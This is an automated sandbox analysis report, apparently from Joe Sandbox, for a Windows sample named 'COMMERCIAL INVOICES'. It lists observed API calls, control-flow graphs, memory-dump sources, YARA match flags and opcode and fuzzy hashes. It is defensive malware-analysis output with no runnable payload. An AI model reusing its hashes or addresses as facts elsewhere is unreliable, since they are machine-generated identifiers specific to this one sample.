                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 1c21d2b3637885354a80eed599717dd7c3ae1be2030ee2983332869aaaa82d83
                                                                                                                                                                                                                                      • Instruction ID: 6056939940f59e193525ce503b285d2147de76fef68ec2bd6024c06e391e9275
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c21d2b3637885354a80eed599717dd7c3ae1be2030ee2983332869aaaa82d83
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E031C7B1E056288BEB18CF6BC9053DDFAF7AFC9305F04C0AAC40CAA264DB750955CE41

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:1.2%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:4.8%
                                                                                                                                                                                                                                      Signature Coverage:7.6%
                                                                                                                                                                                                                                      Total number of Nodes:145
                                                                                                                                                                                                                                      Total number of Limit Nodes:12
                                                                                                                                                                                                                                      execution_graph 93593 4249e3 93598 4249fc 93593->93598 93594 424a89 93595 424a44 93601 42e3c3 93595->93601 93598->93594 93598->93595 93599 424a84 93598->93599 93600 42e3c3 RtlFreeHeap 93599->93600 93600->93594 93604 42c653 93601->93604 93603 424a54 93605 42c670 93604->93605 93606 42c681 RtlFreeHeap 93605->93606 93606->93603 93607 413780 93608 413799 93607->93608 93610 4136fe 93607->93610 93609 413768 93610->93609 93613 42c563 93610->93613 93614 42c57d 93613->93614 93617 1282c70 LdrInitializeThunk 93614->93617 93615 413715 93617->93615 93618 42f583 93619 42f593 93618->93619 93620 42f599 93618->93620 93623 42e4a3 93620->93623 93622 42f5bf 93626 42c603 93623->93626 93625 42e4be 93625->93622 93627 42c61d 93626->93627 93628 42c62e RtlAllocateHeap 93627->93628 93628->93625 93629 42b8a3 93630 42b8bd 93629->93630 93633 1282df0 LdrInitializeThunk 93630->93633 93631 42b8e5 93633->93631 93742 424653 93743 42466f 93742->93743 93744 424697 93743->93744 93745 4246ab 93743->93745 93746 42c2d3 NtClose 93744->93746 93747 42c2d3 NtClose 93745->93747 93748 4246a0 93746->93748 93749 4246b4 93747->93749 93752 42e4e3 RtlAllocateHeap 93749->93752 93751 4246bf 93752->93751 93634 413c63 93635 413c7d 93634->93635 93640 417413 93635->93640 93637 413c9b 93638 413ce0 93637->93638 93639 413ccf PostThreadMessageW 93637->93639 93639->93638 93641 417437 93640->93641 93642 417473 LdrLoadDll 93641->93642 93643 41743e 93641->93643 93642->93643 93643->93637 93644 411683 93645 411698 93644->93645 93650 413973 93645->93650 93649 4116b1 93651 413999 93650->93651 93653 4116a4 93651->93653 93657 4136f3 LdrInitializeThunk 93651->93657 93653->93649 93654 42c2d3 93653->93654 93655 42c2ed 93654->93655 93656 42c2fe NtClose 93655->93656 93656->93649 93657->93653 93753 418a73 93754 418aa3 93753->93754 93756 418acf 93754->93756 93757 41af33 93754->93757 93758 41af77 93757->93758 93759 41af98 93758->93759 93760 42c2d3 NtClose 93758->93760 93759->93754 93760->93759 93761 41a1d3 93762 41a1eb 93761->93762 93764 41a245 93761->93764 93762->93764 93765 41e133 93762->93765 93766 41e159 93765->93766 93770 41e250 93766->93770 93771 42f6b3 93766->93771 93768 41e1ee 93769 42b8f3 LdrInitializeThunk 93768->93769 93768->93770 93769->93770 93770->93764 93772 42f623 93771->93772 93773 42f680 93772->93773 93774 42e4a3 RtlAllocateHeap 93772->93774 93773->93768 93775 42f65d 93774->93775 93776 42e3c3 RtlFreeHeap 93775->93776 93776->93773 93658 401a46 93659 401a54 93658->93659 93659->93659 93662 42fa53 93659->93662 93665 42df73 93662->93665 93666 42df99 93665->93666 93677 4071e3 93666->93677 93668 42dfaf 93669 401b04 93668->93669 93680 41ad43 93668->93680 93671 42dfce 93672 42dfe3 93671->93672 93695 42c6a3 93671->93695 93691 427f73 93672->93691 93675 42dffd 93676 42c6a3 ExitProcess 93675->93676 93676->93669 93698 4160d3 93677->93698 93679 4071f0 93679->93668 93681 41ad6f 93680->93681 93716 41ac33 93681->93716 93684 41ad9c 93685 42c2d3 NtClose 93684->93685 93689 41ada7 93684->93689 93685->93689 93686 41add0 93686->93671 93687 41adb4 93687->93686 93688 42c2d3 NtClose 93687->93688 93690 41adc6 93688->93690 93689->93671 93690->93671 93692 427fd4 93691->93692 93694 427fe1 93692->93694 93727 418283 93692->93727 93694->93675 93696 42c6c0 93695->93696 93697 42c6d1 ExitProcess 93696->93697 93697->93672 93699 4160f0 93698->93699 93701 416109 93699->93701 93702 42cd53 93699->93702 93701->93679 93703 42cd6d 93702->93703 93704 42cd9c 93703->93704 93709 42b8f3 93703->93709 93704->93701 93707 42e3c3 RtlFreeHeap 93708 42ce15 93707->93708 93708->93701 93710 42b90d 93709->93710 93713 1282c0a 93710->93713 93711 42b939 93711->93707 93714 1282c1f LdrInitializeThunk 93713->93714 93715 1282c11 93713->93715 93714->93711 93715->93711 93717 41ad29 93716->93717 93718 41ac4d 93716->93718 93717->93684 93717->93687 93722 42b993 93718->93722 93721 42c2d3 NtClose 93721->93717 93723 42b9ad 93722->93723 93726 12835c0 LdrInitializeThunk 93723->93726 93724 41ad1d 93724->93721 93726->93724 93729 4182ad 93727->93729 93728 4187ab 93728->93694 93729->93728 93735 4138d3 93729->93735 93731 4183da 93731->93728 93732 42e3c3 RtlFreeHeap 93731->93732 93733 4183f2 93732->93733 93733->93728 93734 42c6a3 ExitProcess 93733->93734 93734->93728 93737 4138f3 93735->93737 93738 41395c 93737->93738 93740 41b053 RtlFreeHeap LdrInitializeThunk 93737->93740 93738->93731 93739 413952 93739->93731 93740->93739 93741 1282b60 LdrInitializeThunk

                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                      Function 00417413 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 209 417413-41743c call 42f0c3 212 417442-417450 call 42f6c3 209->212 213 41743e-417441 209->213 216 417460-417471 call 42da43 212->216 217 417452-41745d call 42f963 212->217 222 417473-417487 LdrLoadDll 216->222 223 41748a-41748d 216->223 217->216 222->223
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417485
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Load
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                                                                                                                      • Opcode ID: 5dcbc6baf4d259431639129e786eea26c350e9648a9a52f79217b35080b91802
                                                                                                                                                                                                                                      • Instruction ID: e2f4adb055e614b17f7a8f9d9b519583d9b4e97fe9e6ebd22647c561ca6d8ebe
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5dcbc6baf4d259431639129e786eea26c350e9648a9a52f79217b35080b91802
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA015EB1E4020DABDB10DAE1DC42FDEB7789B54308F4041AAE90897241F674EB488B95
                                                                                                                                                                                                                                      Function 0042C2D3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 229 42c2d3-42c30c call 404563 call 42d543 NtClose
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C307
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                                                                                                      • Opcode ID: febe32e7eea80cbd433ec382fcb712a4c5645aad6e5cf033f31accf23b9c9390
                                                                                                                                                                                                                                      • Instruction ID: 4598b5e4a1033670ebfc613ee9756e7837bcf548e0a1add36e41a53082609fef
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: febe32e7eea80cbd433ec382fcb712a4c5645aad6e5cf033f31accf23b9c9390
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8E086352403147BD650FA5ADC41F97775CDFC5754F404019FA0867181C6B1BA01C7F4
                                                                                                                                                                                                                                      Function 01282B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 243 1282b60-1282b6c LdrInitializeThunk
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 2c6845b6c830b748cba9326b51a25a252c2da44396ec898d1de87f01ea81bb74
                                                                                                                                                                                                                                      • Instruction ID: a0ccd530de65f285a440642fa623a8cff94bc64e92eba4b1b4c3a454f197506b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c6845b6c830b748cba9326b51a25a252c2da44396ec898d1de87f01ea81bb74
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD900261212404034605715C4414616400A97E1201B59C021E2018590DC52989916229
                                                                                                                                                                                                                                      Function 01282DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 245 1282df0-1282dfc LdrInitializeThunk
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: b9bfb85ecf557f65afe96b1d4d7b0332d0bb3e5b30a39eb7006aabbb8a200c01
                                                                                                                                                                                                                                      • Instruction ID: 0669751170a525cc7054e4d5292200b2ce7d41ec890a0f678acadc894c2e40e2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9bfb85ecf557f65afe96b1d4d7b0332d0bb3e5b30a39eb7006aabbb8a200c01
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D90023121140813D611715C4504707000997D1241F99C412A1428558DD65A8A52A225
                                                                                                                                                                                                                                      Function 01282C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 244 1282c70-1282c7c LdrInitializeThunk
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 3f841b1b0fdf17bdf4ef14f4632e3ea1af28113bee1e743f1c1b70e9d3a8c883
                                                                                                                                                                                                                                      • Instruction ID: 2a9c6862828db617c7eb499843b53072c44ae9fe28bc637d545a7e50c38cb2aa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f841b1b0fdf17bdf4ef14f4632e3ea1af28113bee1e743f1c1b70e9d3a8c883
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4390023121148C02D610715C840474A000597D1301F5DC411A5428658DC69989917225
                                                                                                                                                                                                                                      Function 012835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 10d8224abb062cde60fb48977f2f5b62e5fe53128f36aa02b768369daf60cd6c
                                                                                                                                                                                                                                      • Instruction ID: ee5f8d20e7ce5026907c10ea84bc70802c39f7805770af2bcf9fed0dbec25557
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10d8224abb062cde60fb48977f2f5b62e5fe53128f36aa02b768369daf60cd6c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA90023161550802D600715C4514706100597D1201F69C411A1428568DC7998A5166A6
                                                                                                                                                                                                                                      Function 00413BC2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78threadwindowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • PostThreadMessageW.USER32(2636-l0,00000111,00000000,00000000), ref: 00413CDA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                                                                                                                      • String ID: 2636-l0$2636-l0
                                                                                                                                                                                                                                      • API String ID: 1836367815-1971679396
                                                                                                                                                                                                                                      • Opcode ID: fe0b0fde2066830886931e99d926b35beca9fe550bd22d31d98ca82f5d4cf294
                                                                                                                                                                                                                                      • Instruction ID: 6b296ec2e4225bc39ac9137ca907657d14a3ff643f00039ac8e10a0b62862b18
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe0b0fde2066830886931e99d926b35beca9fe550bd22d31d98ca82f5d4cf294
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04112972E4011D7EDB01AAA59C81DEF7F6CDF41698F04846AF900A7241E6398E0687E5
                                                                                                                                                                                                                                      Function 00413C60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 16 413c60-413c75 17 413c7d-413ccd call 42ee73 call 417413 call 4044d3 call 424b03 16->17 18 413c78 call 42e463 16->18 27 413ced-413cf3 17->27 28 413ccf-413cde PostThreadMessageW 17->28 18->17 28->27 29 413ce0-413cea 28->29 29->27
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • PostThreadMessageW.USER32(2636-l0,00000111,00000000,00000000), ref: 00413CDA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                                                                                                                      • String ID: 2636-l0$2636-l0
                                                                                                                                                                                                                                      • API String ID: 1836367815-1971679396
                                                                                                                                                                                                                                      • Opcode ID: f7335a4b2c943aeb5b5e2b9d6c649ed8104770c8651fb65c495380f6116aec95
                                                                                                                                                                                                                                      • Instruction ID: 5f4406f0e4de0b3dfe4f388cd0b4aa32fac0830c3daf58662237cd0961209bdc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7335a4b2c943aeb5b5e2b9d6c649ed8104770c8651fb65c495380f6116aec95
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D01C872D4021C7AEB10AAD59C82DEF7F7CDF41698F048069FA1477141D6785E064BA5
                                                                                                                                                                                                                                      Function 00413C63 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 30 413c63-413c75 31 413c7d-413ccd call 42ee73 call 417413 call 4044d3 call 424b03 30->31 32 413c78 call 42e463 30->32 41 413ced-413cf3 31->41 42 413ccf-413cde PostThreadMessageW 31->42 32->31 42->41 43 413ce0-413cea 42->43 43->41
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • PostThreadMessageW.USER32(2636-l0,00000111,00000000,00000000), ref: 00413CDA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                                                                                                                      • String ID: 2636-l0$2636-l0
                                                                                                                                                                                                                                      • API String ID: 1836367815-1971679396
                                                                                                                                                                                                                                      • Opcode ID: b4662b19418b140157cd0eaaf848162852b4a27cf2d4f3b5962adba5849ba92b
                                                                                                                                                                                                                                      • Instruction ID: 45b883e6a5aaee5c2d591038c8df68d750626b4cd5d5896ce137520db01301b1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4662b19418b140157cd0eaaf848162852b4a27cf2d4f3b5962adba5849ba92b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE01C872D4011C7ADB10AAD59C81DEF7F7CDF40698F048069FA1477141D6785E064BA5
                                                                                                                                                                                                                                      Function 004174AE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 44 4174ae-4174af 45 4174b1-4174f2 44->45 46 41744b-417450 44->46 49 4174f4-4174fa 45->49 50 4174fb-417513 45->50 47 417460-417471 call 42da43 46->47 48 417452-41745d call 42f963 46->48 59 417473-417487 LdrLoadDll 47->59 60 41748a-41748d 47->60 48->47 49->50 51 417515-417516 50->51 52 41755f-417561 50->52 55 417518-41751a 51->55 56 41756c-417571 51->56 52->56 61 41752b-41755d 55->61 62 41751d-41752a 55->62 59->60 61->52 62->61
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417485
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Load
                                                                                                                                                                                                                                      • String ID: 6v
                                                                                                                                                                                                                                      • API String ID: 2234796835-3628208636
                                                                                                                                                                                                                                      • Opcode ID: 7fca55cfca3f4642834bdcb50ebb40f9ae7e426c7c5bf9cbfb610512ed6e1b90
                                                                                                                                                                                                                                      • Instruction ID: 86e8de0b69b220123afd75d85ef0778f63e15e3d15d1f3158ea552780d0add05
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7fca55cfca3f4642834bdcb50ebb40f9ae7e426c7c5bf9cbfb610512ed6e1b90
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7231CB76948605EFCB11CF74D880BDA7B78EF04324F5406ABE504EF692E3359A89CB81
                                                                                                                                                                                                                                      Function 0042C653 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 63 42c653-42c697 call 404563 call 42d543 RtlFreeHeap
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C692
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                                                                                                      • String ID: gaA
                                                                                                                                                                                                                                      • API String ID: 3298025750-3487838039
                                                                                                                                                                                                                                      • Opcode ID: 4c937ed6817131215a9a64047fbf09b864b48ad324a668257b2be1f721a64870
                                                                                                                                                                                                                                      • Instruction ID: 0f54cc4c58eed4b11caafc6c3fb3cc4faf5abc868a4e4e94059387e8b55b0c93
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c937ed6817131215a9a64047fbf09b864b48ad324a668257b2be1f721a64870
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8BE092B1604315BBDA14EE59EC41FDB33ACDFC9714F004019FA08A7241C770B91087B5
                                                                                                                                                                                                                                      Function 0042C603 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 224 42c603-42c644 call 404563 call 42d543 RtlAllocateHeap
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,0041E1EE,?,?,00000000,?,0041E1EE,?,?,?), ref: 0042C63F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                      • Opcode ID: eb6040b1fc1fb1cb6ed170ce4c5e49f7b4376ab8879b78008f84ee28e58e6294
                                                                                                                                                                                                                                      • Instruction ID: 5e4f2097ad85ed4dd12722a4a0779c478e64be7103f06555aeb9d7b0c16acb50
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb6040b1fc1fb1cb6ed170ce4c5e49f7b4376ab8879b78008f84ee28e58e6294
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56E06D72644314BBDA10EE59EC41F9B33ACEFC4710F004419FA08A7241C671B910C7B8
                                                                                                                                                                                                                                      Function 0042C6A3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 234 42c6a3-42c6df call 404563 call 42d543 ExitProcess
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,AAF2BD6B,?,?,AAF2BD6B), ref: 0042C6DA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                                                                                                      • Opcode ID: 90b41b10de4001358981773a3cc5b704e093dac5ec8a691516e76633fc460d72
                                                                                                                                                                                                                                      • Instruction ID: 8e64d3ae1f2fcbff29acd26afc7f6174e128b6ccc4e61b38a69ba5a18093cff1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90b41b10de4001358981773a3cc5b704e093dac5ec8a691516e76633fc460d72
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23E046366402147BDA20FA6AEC41F9BB76CDBC5754F40402AFA08A7242C6B0BA0187B5
                                                                                                                                                                                                                                      Function 01282C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 239 1282c0a-1282c0f 240 1282c1f-1282c26 LdrInitializeThunk 239->240 241 1282c11-1282c18 239->241
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 35c6ac851d93258acd4eede8dcbbc904ba5a43902bec412699211a5a1c2aed42
